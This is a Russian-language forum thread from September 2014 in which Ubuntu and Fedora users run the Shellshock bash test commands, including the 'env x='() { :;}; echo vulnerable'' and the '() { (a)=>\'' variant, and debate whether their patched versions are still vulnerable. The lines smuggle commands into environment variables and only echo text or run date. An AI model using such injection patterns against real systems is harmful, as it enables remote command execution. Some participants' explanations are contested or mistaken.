Уязвимость в *nix

[chrome_cat]

(Нажмите, чтобы показать/скрыть)

Код: [Выделить]

~$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: внимание: x: ignoring function definition attempt
bash: ошибка при импортировании определения функции`x'
this is a test

(Нажмите, чтобы показать/скрыть)

Код: [Выделить]

~$ env X='() { (a)=>\' sh -c "echo date"; cat echo
date
cat: echo: Нет такого файла или каталога

Апдейты последние. Ubuntu 14.10.

[Pilot6]

chrome_cat,
Надо так

env -i  X='() { (a)=>\' bash -c 'echo date'; cat echo

У меня срабатывает.

Код: [Выделить]

pilot6@Pilot6:~$ env -i  X='() { (a)=>\' bash -c 'echo date'; cat echo
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
Fri Sep 26 16:08:37 MSK 2014


[Sly_tom_cat]

Pilot6, а в чем заключается срабатывание  ...а разобрался...

14.04 - env -i  X='() { (a)=>\' .... - срабатывает, вчерашний вариант - нет.


Мне только странно почему сегодняшний эксплоит так криво оформлен - вот получше вариант:

Код: [Выделить]

env -i X='() { (a)=>\' echo vunerable; echo done
печатает

Код: [Выделить]

vunerable
doneесли дыра есть, и

Код: [Выделить]

doneесли дыры нет.

[RUstorm]

)))
Сейчас обратно проверил

Код: [Выделить]

env -i X='() { (a)=>\' echo vunerable; echo doneУ меня опять

vunerable
done

но установлена самая последния версия bash 4.2-2ubuntu2.3

[peregrine]

RUstorm, эту уязвимость пока не исправили.

[ArcFi]

Всё пофикшено:

Код: [Выделить]

$ env x='() { :;}; echo vulnerable'  bash -c "echo this is a test"
this is a test
$ env X='() { (a)=>\' sh -c "echo date"; cat echo
date
cat: echo: Нет такого файла или каталога
$ rpm -q bash
bash-4.2.48-2.fc20.x86_64
***
Sly_tom_cat, вы укоротили слишком сильно, поэтому оно показывает ложное срабатывание.

[Sly_tom_cat]

ArcFi, какое ложное?
Срабатывает код после ошибочного определения функции (как и в первом експлоите).
Там без разницы - обернуть в bash -c (sh -c) или непосредственно echo вызвать: оно в любом виде срабатывать не должно, т.к. находится в определении функции (в которой уже есть ошибка).

Собственно и у вас сработало echo date - откуда и появилась строчка date в выводе, которая и сигнализирует об уязвимости (непофикшеной).

[Tear]

Всё пофикшено:

После фикса уязвимость осталась.

[ArcFi]

Sly_tom_cat, для наличия уязвимости должен срабатывать код внутри переменной.
Возможность выполнения команды после переменной — штатная фишка bash.

Tear, без указания версии и дистрибутива ваш вброс тянет на троллинг.

[Sly_tom_cat]

Sly_tom_cat, для наличия уязвимости должен срабатывать код внутри переменной.
Возможность выполнения команды после переменной — штатная фишка bash.

  Ась ? какая это фишка? там что есть разделитель после определения переменной?  ГДЕ? А без разделителя - все что за знаком "=" относится (должно относится) к определению переменной.

Собсвенно в коде

Код: [Выделить]

env X='() { (a)=>\' sh -c "echo date"; cat echoТочно также написан код sh c- "echo date" за закрывающей кавычкой определения.
И чем sh c- "echo date" принципиально отличается от echo vunerable или от ls -la ?

Нет, я безусловно не супер пофессионал в баш-скриптах - но как я понял эта "штатная фишка" и есть та дыра которую мы тут обсуждаем...

[RUstorm]

ubuntu 12.04 (32бит), bash последний  4.2-2ubuntu2.3

Код: [Выделить]

env X='() { (a)=>\' sh -c "echo date"; cat echo

date

Пользователь решил продолжить мысль [time]26 Сентябрь 2014, 22:26:33[/time]:как я понимаю команда date должна сработать, тут она не сработала, значит пофиксили.

[Sly_tom_cat]

Код: [Выделить]

$ echo date
date
echo date просто печатает date

Я и говорю - что непонятно почему так криво оформлен эксплоит

[ArcFi]

там что есть разделитель после определения переменной?

Да, есть.

Код: [Выделить]

man envРазделитель — это пробел.

Код: [Выделить]

env X='() { (a)=>\' sh -c "echo date"; cat echoВ уязвимой версии эта команда создаёт файл echo с результатом выполнения команды date.
В пофикшеной версии просто выполняет "echo date".

Теперь понятно?

[Sly_tom_cat]

Код: [Выделить]

env X='() { (a)=>\' sh -c "echo date"; cat echoВ уязвимой версии эта команда создаёт файл echo с результатом выполнения команды date.
В пофикшеной версии просто выполняет "echo date".

А разве в 

Код: [Выделить]

env X='() { (a)=>\' sh -c "echo date"; cat echoза =>\' тоже есть пробел...
И я не понял - как там создается файл Просто совсем не понимаю, если не трудно, поясните как эта ерунда этот код работает.

[Sly_tom_cat]

Кстати

Код: [Выделить]

env -i X='() { (a)=>\' bash -c "echo date"; cat echo
срабатывает (выводит дату из файла echo).

а

Код: [Выделить]

env -i X='() { (a)=>\' sh -c "echo date"; cat echo
не срабатывает.